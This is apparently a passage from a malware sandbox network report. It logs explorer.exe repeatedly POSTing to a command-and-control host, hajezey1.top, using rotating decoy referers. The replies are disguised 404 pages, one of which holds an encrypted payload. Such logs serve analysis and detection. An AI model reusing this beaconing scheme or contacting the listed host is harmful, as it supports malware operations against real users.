                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            43192.168.2.549834185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:01.494781971 CEST12486OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://yhtqeo.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 272
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:01.573544025 CEST12487INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            44192.168.2.549835185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:01.683342934 CEST12488OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://wepobp.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 352
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:01.762871027 CEST12489INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            45192.168.2.549836185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:01.858397961 CEST12490OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://uriot.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 337
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:01.941761971 CEST12491INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            46192.168.2.549837185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:02.028760910 CEST12492OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://isqhctlhh.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 257
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:02.106965065 CEST12493INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:02 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            47192.168.2.549838185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:02.188205004 CEST12493OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://pbejr.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 316
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:02.273143053 CEST12494INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:02 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            48192.168.2.549839185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:02.361143112 CEST12495OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ufipchi.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 236
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:02.446659088 CEST12497INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:02 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 83 28 c8 53 57 5c 29 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 cc ec d2 ca 71 c4 7c be 0c c8 8c 31 f4 d1 98 44 68 38 4b 79 b3 fd ce d5 41 be 53 c9 5c a3 96 52 9b 1f d5 b8 e2 60 1b d6 d6 3d 1b cc c6 84 5b c2 67 7b 0d fc 45 a7 fd 00 72 6f 0e 3b 9a eb 96 06 d9 9a 3c ea d4 28 6a a3 4e 6e ad 0c 0f 59 cf 4c 15 6a c1 a8 a4 02 cb 50 7b 09 6a 86 79 d7 95 e7 05 f5 e1 94 52 e8 59 9b c5 a7 86 38 b4 f2 a7 7c 2b f0 3a cb 8f 8c f5 cf 9b 3b 66 9b 16 b8 eb 1b e5 d7 4a 74 d0 eb d8 07 cd 23 90 78 51 71 a2 8f d2 ee cf 1c e0 02 02 50 08 08 d8 e2 20 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 94 d5 d6 cb 0f 3d 61 19 f7 cb d2 b3 01 92 b4 b9 c1 82 20 59 57 11 5c 7c a3 7b ab ab 09 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 15 67 aa cf 30 c0 7a 9f 06 a2 7f c1 96 98 8b 36 19 19 cb 8a 13 d8 06 0e 45 87 13 7d 6f fd e0 04 89 f9 d4 57 80 90 70 89 f4 25 75 6b de f2 a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 75 01 35 07 1e fe 63 4b 83 8b 14 ca c3 f3 b2 ec 92 c0 15 1c 57 ec 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 7e 70 9f 6a a8 a5 17 08 e8 e1 98 ab e1 5f 11 87 4a 71 87 56 b0 50 f6 0a bf d9 6b 91 e0 55 d0 66 21 df 76 79 27 24 58 96 3a 39 d1 da 03 d4 30 74 61 27 47 c2 e6 5e 89 b2 e2 9b 52 ec c0 76 a7 e2 f0 b5 c3 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 78 2d 7f d4 2c d6 e8 b1 14 73 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 36 41 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e 8e ea 4c 76 7b de e2 46 f0 2e 56 bb 43 3e 8f 17 94 6b 36 a4 29 ec 90 bc 10 c9 2a 7c bd 67 c1 aa d7 b0 5d 28 ed fe 7b 9c 4d 16 94 18 42 26 2e 92 cc 1e fe 18 aa 34 a6 6d 96 8e a4 42 1f 01 31 fd ce 0f 88 f4 0e 37 c4 fe 87 75 87 f0 d3 4b 1d 53 58 1d a5 05 80 e0 2d f0 0e 55 f6 1f 5f a1 67 50 41 48 ab 0b 52 ea 5a 15 6c de 30 ea 2e ad 46 6a de 5e f7 44 18 bd 95 59 f8 d2 3e b8 77 24 7e 65 b9 0a f1 91 cf f3 bc 34 bc 36 b3 ec d3 70 01 21 f4 5c 58 2b 72 12 c9 8e 70 ac e4 26 be 99 04 33 2b 22 f5 2d 09 7d a2 d1 92 4b de 94 cf 91 7b 41 0a f6 29 8f 4d aa d1 b9 ba 97 30 d0 47 43 05 f2 42 e6 56 91 24 c8 00 66 b4 ea f1 ea 7f ae 1a a5 f4 ea 4c 90 54 77 8b ee 2b 0b 67 45 12 c3 3e ba 2d 09 86 99 57 f9 68 8d 90 26 d3 d6 c0 c8 30 6f 41 cb 1b b9 71 ca 6d 88 44 13 51 13 66 7d 6c 65 04 f5 7f f6 50 99 85 84 90 c1 2f d1 0c 6a c3 1b 95 50 49 25 3f d2 3e 20 12 1e b7 6b 6c cc bd 41 2b 1b 23 28 21 ae 60 78 2f 46 5e 1e b2 57 d9 bd be 2f 83 ef d9 a7 8f 83 f1 60 4c 72 fe 24 f4 89 6f e4 f7 81 c4 ff 58 4f dd d7 ef 3d 08 bb 78 fd 16 f7 c9 66 bd 2b da df 97 5f 29 86 97 72 20 bd 29 71 96 25 a6 46 bd 59 f8 b6 06 d7 55 02 a0 48 79 68 42 65 09 90 ed ff 21 ab c0 00 75 94 f2 cb 54 26 12 ad 67 61 8a ec 1c dc ce 76 60 4c 00 c8 98 ff e0 2b 03 c6 c0 fb 71 7b 01 00 a5 20 e0 e2 cc 93 4f fd 40 9c 81 b9 f3 31 9d cb 16 fc 7a 8a 44 b1 00 38 6d 10 e8 30 9c d3 4f 18 6d 24 17 24 c2 d2 64 5b b6 ce 4c 23 78 f1 cd 26 84 47 75 a8 af 56 07 99 9a 8d e9 62 0d 6b 81 e6 c5 be 33 0f 4c ee 8a 50 0d 5b 15 d0 3b 94 e7 59 50 b9 da 1b f5 4e e8 47 96 7c 84 e0 f8 cd 8d 8d 85 91 db 23 bb 4c 35 05 7b 21 95 0a f0 ec 1f 63 21 9b f6 a7 d1 b8 f1 eb 2c 25 61 22 ac 11 57 c1 de a0 18 ce 1f 8a 1f c5 c0 85 a6 91 23 67 db 11 ae 7b 2c 47 e5 54 e1 ed 58 71 e7 11 86 a2 98 37 e0 8d 92 fc 04 88 05 e2 e4 4e e8 31 2b cb 30 84 db 90 2a 08 9a 39 5e f6 d0 94 67 9b fc 20 31 8d 6b 4f b1 87 b1 75 54 a1 3e 29 4d fa 74 64 9b c0 9f b5 bc a8 33 19 34 41 38 62 e8 c7 4e b0 bf d0 cc 4d 50 08 d6 e5 09 ad cd a6 a7 3f 4f a9 04
                                                            Data Ascii: 1f66(SW\)iP"&&grq|1Dh8KyAS\R`=[g{Ero;<(jNnYLjP{jyRY8|+:;fJt#xQqP Oby=a YW\|{MXKw[Ge)29g0z6E}oWp%uk"H2I?o|6NIu5cKW~5=PV~pj_JqVPkUf!vy'$X:90ta'G^Rv`#>[qJx-,sq"JG0Z"?+QzpJMQAd'\#&Q#F<p6A>C/CLv{F.VC>k6)*|g]({MB&.4mB17uKSX-U_gPAHRZl0.Fj^DY>w$~e46p!\X+rp&3+"-}K{A)M0GCBV$fLTw+gE>-Wh&0oAqmDQf}leP/jPI%?> klA+#(!`x/F^W/`Lr$oXO=xf+_)r )q%FYUHyhBe!uT&gav`L+q{ O@1zD8m0Om$$d[L#x&GuVbk3LP[;YPNG|#L5{!c!,%a"W#g{,GTXq7N1+0*9^g 1kOuT>)Mtd34A8bNMP?O


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            49192.168.2.549840185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:09.495573044 CEST14519OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://vlotoun.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 314
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:09.571465969 CEST14520INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:09 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.549756185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:11.726389885 CEST1172OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://xauocndh.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 146
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:11.805908918 CEST1172INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:11 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
